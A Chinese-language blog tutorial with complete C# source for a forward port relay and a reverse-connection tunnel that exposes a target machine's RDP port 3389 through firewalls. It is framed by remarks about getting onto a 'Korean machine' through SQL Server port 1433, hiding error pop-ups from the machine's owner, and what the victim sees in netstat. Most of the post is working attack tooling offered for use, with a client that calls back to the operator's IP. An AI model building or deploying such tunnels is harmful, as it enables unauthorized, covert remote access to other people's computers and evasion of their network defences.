LOGO OA教程 ERP教程 模切知识交流 PMS教程 CRM教程 开发文档 其他文档  
 
网站管理员

C#做端口转发程序支持正向连接和反向链接
admin
2021年2月2日 18:48 本文热度 5702

3389的时候

例子1:连接a机器的3389端口连不上,因为对方防火墙或者网关做了限制,只能访问a机器的个别端口比如80。

例子2:连接a机器的几乎所有端口都连不上(对方乃内网或者防火墙网关做了限制),只能1433上去,但是对方可以连接你的某些端口。

 

解决

第一种较简单,只需要程序在对方开80,你连接他80,程序收到数据后,发送到他本机的3389,同时从他3389收到数据后返回到你。程序就是一个中转站。

 

[c-sharp]  view plain copy
  1. using System;  
  2. using System.Net.Sockets;  
  3. using System.Threading;  
  4.   
  5. namespace PortTransponder  
  6. {  
  7.     class Program  
  8.     {  
  9.         static void Main(string[] args)  
  10.         {  
  11.             TcpListener tl = new TcpListener(80);//这里开对方可以被你连接并且未被占用的端口  
  12.             tl.Start();  
  13.             while (true)//这里必须用循环,可以接收不止一个客户,因为我发现终端服务有时一个端口不行就换一个端口重连  
  14.             {  
  15.                 //下面的意思就是一旦程序收到你发送的数据包后立刻开2个线程做中转  
  16.                 try  
  17.                 {  
  18.                     TcpClient tc1 = tl.AcceptTcpClient();//这里是等待数据再执行下边,不会100%占用cpu  
  19.                     TcpClient tc2 = new TcpClient("localhost", 3389);  
  20.                     tc1.SendTimeout = 300000;//设定超时,否则端口将一直被占用,即使失去连接  
  21.                     tc1.ReceiveTimeout = 300000;  
  22.                     tc2.SendTimeout = 300000;  
  23.                     tc2.ReceiveTimeout = 300000;  
  24.                     object obj1 = (object)(new TcpClient[] { tc1, tc2 });  
  25.                     object obj2 = (object)(new TcpClient[] { tc2, tc1 });  
  26.                     ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj1);  
  27.                     ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj2);  
  28.                 }  
  29.                 catch { }  
  30.             }  
  31.         }  
  32.         public static void transfer(object obj)  
  33.         {  
  34.             TcpClient tc1 = ((TcpClient[])obj)[0];  
  35.             TcpClient tc2 = ((TcpClient[])obj)[1];  
  36.             NetworkStream ns1 = tc1.GetStream();  
  37.             NetworkStream ns2 = tc2.GetStream();  
  38.             while (true)  
  39.             {  
  40.                 try  
  41.                 {  
  42.                     //这里必须try catch,否则连接一旦中断程序就崩溃了,要是弹出错误提示让机主看见那就囧了  
  43.                     byte[] bt = new byte[10240];  
  44.                     int count = ns1.Read(bt, 0, bt.Length);  
  45.                     ns2.Write(bt, 0, count);  
  46.                 }  
  47.                 catch  
  48.                 {  
  49.                     ns1.Dispose();  
  50.                     ns2.Dispose();  
  51.                     tc1.Close();  
  52.                     tc2.Close();  
  53.                     break;  
  54.                 }  
  55.             }  
  56.         }  
  57.     }  
  58. }  

这样在对方机器执行和,直接mstsc /v:对方ip:80就能终端上去了。


第二种稍微复杂一点,需要客户机和服务器2个程序,你在自己机器上开服务器端,在对方机器上执行客户端连接你的服务器端,一旦连接上你的服务器端再开个端口让终端程序连接,对方机器上客户端再开个端口连接他自己的3389,做2次中转就可以终端上去了。

具体流程:

本机ip开8080端口,对方机器连接你的8080端口,比如端口是49908。连接成功后,你的机器再开一个比如9833端口,对方机器再开一个连接连接他自己的3389,比如端口是49909吧。好,这时你用你的mstsc连接自己的 localhost:9833,数据包就从本机9833-本机8080-对方49908-对方49909-对方3389,对方3389的数据反着回来就行了。

[c-sharp]  view plain copy
  1. //服务器端  
  2. using System;  
  3. using System.Collections.Generic;  
  4. using System.Net.Sockets;  
  5. using System.Threading;  
  6.   
  7. namespace fanxiangserver  
  8. {  
  9.     class Program  
  10.     {  
  11.         public static Dictionary<int, TcpClient> dic = new Dictionary<int, TcpClient>();  
  12.         public static NetworkStream kongzhins = null;  
  13.         static void Main(string[] args)  
  14.         {  
  15.             ThreadPool.QueueUserWorkItem(new WaitCallback(start1));  
  16.             ThreadPool.QueueUserWorkItem(new WaitCallback(start2));  
  17.             WaitHandle.WaitAll(new ManualResetEvent[] { new ManualResetEvent(false) });  
  18.         }  
  19.         public static void start1(object obj)  
  20.         {  
  21.             TcpListener tl = new TcpListener(8080);//开一个对方可以连接的端口,今天这棒子机器连他只能1433,其他连不上,他连别人只能80 8080 21     
  22.             tl.Start();  
  23.             while (true)  
  24.             {  
  25.                 TcpClient tc = tl.AcceptTcpClient();  
  26.                 jieshou(tc);  
  27.             }  
  28.         }  
  29.         public static void start2(object obj)  
  30.         {  
  31.             TcpListener tl = new TcpListener(9833); //开一个随意端口让自己的mstsc连。     
  32.             tl.Start();  
  33.             while (true)  
  34.             {  
  35.                 TcpClient tc = tl.AcceptTcpClient();  
  36.                 Random rnd = new Random();  
  37.                 int biaoji = rnd.Next(1000000000, 2000000000);  
  38.                 dic.Add(biaoji, tc);  
  39.                 byte[] bt = BitConverter.GetBytes(biaoji);  
  40.                 kongzhins.Write(bt, 0, bt.Length);  
  41.             }  
  42.         }  
  43.         public static void jieshou(TcpClient tc)  
  44.         {  
  45.             //这里体现的是一个配对的问题,自己体会一下吧  
  46.             NetworkStream ns = tc.GetStream();  
  47.             byte[] bt = new byte[4];  
  48.             int count = ns.Read(bt, 0, bt.Length);  
  49.             if (count == 2 && bt[0] == 0x6f && bt[1] == 0x6b)  
  50.             {  
  51.                 kongzhins = ns;  
  52.             }  
  53.             else  
  54.             {  
  55.                 int biaoji = BitConverter.ToInt32(bt, 0);  
  56.                 lianjie(biaoji, tc);  
  57.             }  
  58.         }  
  59.         public static void lianjie(int biaoji, TcpClient tc1)  
  60.         {  
  61.             TcpClient tc2 = null;  
  62.             if (dic.ContainsKey(biaoji))  
  63.             {  
  64.                 dic.TryGetValue(biaoji, out tc2);  
  65.                 dic.Remove(biaoji);  
  66.                 tc1.SendTimeout = 300000;  
  67.                 tc1.ReceiveTimeout = 300000;  
  68.                 tc2.SendTimeout = 300000;  
  69.                 tc2.ReceiveTimeout = 300000;  
  70.                 object obj1 = (object)(new TcpClient[] { tc1, tc2 });  
  71.                 object obj2 = (object)(new TcpClient[] { tc2, tc1 });  
  72.                 ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj1);  
  73.                 ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj2);  
  74.             }  
  75.         }  
  76.         public static void transfer(object obj)  
  77.         {  
  78.             TcpClient tc1 = ((TcpClient[])obj)[0];  
  79.             TcpClient tc2 = ((TcpClient[])obj)[1];  
  80.             NetworkStream ns1 = tc1.GetStream();  
  81.             NetworkStream ns2 = tc2.GetStream();  
  82.             while (true)  
  83.             {  
  84.                 try  
  85.                 {  
  86.                     //这里必须try catch,否则连接一旦中断程序就崩溃了,要是弹出错误提示让机主看见那就囧了  
  87.                     byte[] bt = new byte[10240];  
  88.                     int count = ns1.Read(bt, 0, bt.Length);  
  89.                     ns2.Write(bt, 0, count);  
  90.                 }  
  91.                 catch  
  92.                 {  
  93.                     ns1.Dispose();  
  94.                     ns2.Dispose();  
  95.                     tc1.Close();  
  96.                     tc2.Close();  
  97.                     break;  
  98.                 }  
  99.             }  
  100.         }  
  101.     }  
  102. }  

[c-sharp]  view plain copy
  1. //客户端  
  2. using System;  
  3. using System.Text;  
  4. using System.Net.Sockets;  
  5. using System.Threading;  
  6.   
  7. namespace fanxiangclient  
  8. {  
  9.     class Program  
  10.     {  
  11.         public static NetworkStream kongzhins = null;  
  12.         static void Main(string[] args)  
  13.         {  
  14.             try  
  15.             {  
  16.                 TcpClient tc = new TcpClient("你的IP", 8080);  
  17.                 kongzhins = tc.GetStream();  
  18.                 byte[] bt = Encoding.Default.GetBytes("ok");//这里发送一个连接提示  
  19.                 kongzhins.Write(bt, 0, bt.Length);  
  20.                 jieshou();  
  21.                 WaitHandle.WaitAll(new ManualResetEvent[] { new ManualResetEvent(false) });//这里为什么要这样呢?我发现sqlserver执行是localsystem账号如果console.read()程序马上退出  
  22.             }  
  23.             catch { }  
  24.         }  
  25.         public static void jieshou()  
  26.         {  
  27.             while (true)  
  28.             {  
  29.                 byte[] bt = new byte[4];  
  30.                 kongzhins.Read(bt, 0, bt.Length);  
  31.                 TcpClient tc1 = new TcpClient("你的IP", 8080);  
  32.                 TcpClient tc2 = new TcpClient("localhost", 3389);  
  33.                 tc1.SendTimeout = 300000;  
  34.                 tc1.ReceiveTimeout = 300000;  
  35.                 tc2.SendTimeout = 300000;  
  36.                 tc2.ReceiveTimeout = 300000;  
  37.                 tc1.GetStream().Write(bt, 0, bt.Length);  
  38.                 object obj1 = (object)(new TcpClient[] { tc1, tc2 });  
  39.                 object obj2 = (object)(new TcpClient[] { tc2, tc1 });  
  40.                 ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj1);  
  41.                 ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj2);  
  42.             }  
  43.         }  
  44.         public static void transfer(object obj)  
  45.         {  
  46.             TcpClient tc1 = ((TcpClient[])obj)[0];  
  47.             TcpClient tc2 = ((TcpClient[])obj)[1];  
  48.             NetworkStream ns1 = tc1.GetStream();  
  49.             NetworkStream ns2 = tc2.GetStream();  
  50.             while (true)  
  51.             {  
  52.                 try  
  53.                 {  
  54.                     byte[] bt = new byte[10240];  
  55.                     int count = ns1.Read(bt, 0, bt.Length);  
  56.                     ns2.Write(bt, 0, count);  
  57.                 }  
  58.                 catch  
  59.                 {  
  60.                     ns1.Dispose();  
  61.                     ns2.Dispose();  
  62.                     tc1.Close();  
  63.                     tc2.Close();  
  64.                     break;  
  65.                 }  
  66.             }  
  67.         }  
  68.     }  
  69. }  

好,这样你连接mstsc /v:localhost:9833,后数据就经过了好几转转到了对方的3389上。这样即使对方是内网也可以被终端了,而且好处是对方查看netstat -an看到的是这种东西。

以上程序都是经我测试后非常ok的,但是没有经过优化,尤其是反向连接的,可以做成个服务是吧,或者连接的时候加个验证啦什么的,还有我的Ip地址也是变的,可以做成个服务,定时读取某一网页上我的新ip,告诉他连还是不连啦,什么的。而且还可以做成个http代理翻wall啦,总之花样是很多的。

看到好多人说cpu占用率高什么的,我补充一句,我给出代码的目的是告诉大家端口转发的方法和思路,并不是让你直接粘过去用,如果那样的话我直接编译成exe不就完了吗,授人以鱼不如授人以渔对吧,所以大家看明白了怎么回事自己去改和优化,像缓冲区大小是否合适啦,超时啦,连接判断啦什么的,这些都是要自己去优化的,所以代码很短嘛,就是为了让大家看的简单明了,所以直接用的话效率不会很高,但这是个完整骨架,我自己用的就在这段骨架的基础上优化并增加了很多功能,而且cpu占用率内存占用都是没有问题的。


该文章在 2021/2/2 18:48:55 编辑过

全部评论1
admin
2021年2月4日 11:47
源码附件:PortTransfer.rar

注意服务器端防火墙一定要开放相应端口,确保外部电脑能够连接到此端口。
以上代码只是说明了原理可能,在实际使用中,不应该将上述功能弄成主线程,否则整个程序都处于挂起状态,无法进行其他操作或中断运行,应该放在子线程中执行。

该评论在 2021/2/4 11:48:46 编辑过
关键字查询
相关文章
正在查询...
点晴ERP是一款针对中小制造业的专业生产管理软件系统,系统成熟度和易用性得到了国内大量中小企业的青睐。
点晴PMS码头管理系统主要针对港口码头集装箱与散货日常运作、调度、堆场、车队、财务费用、相关报表等业务管理,结合码头的业务特点,围绕调度、堆场作业而开发的。集技术的先进性、管理的有效性于一体,是物流码头及其他港口类企业的高效ERP管理信息系统。
点晴WMS仓储管理系统提供了货物产品管理,销售管理,采购管理,仓储管理,仓库管理,保质期管理,货位管理,库位管理,生产管理,WMS管理系统,标签打印,条形码,二维码管理,批号管理软件。
点晴免费OA是一款软件和通用服务都免费,不限功能、不限时间、不限用户的免费OA协同办公管理系统。
Copyright 2010-2025 ClickSun All Rights Reserved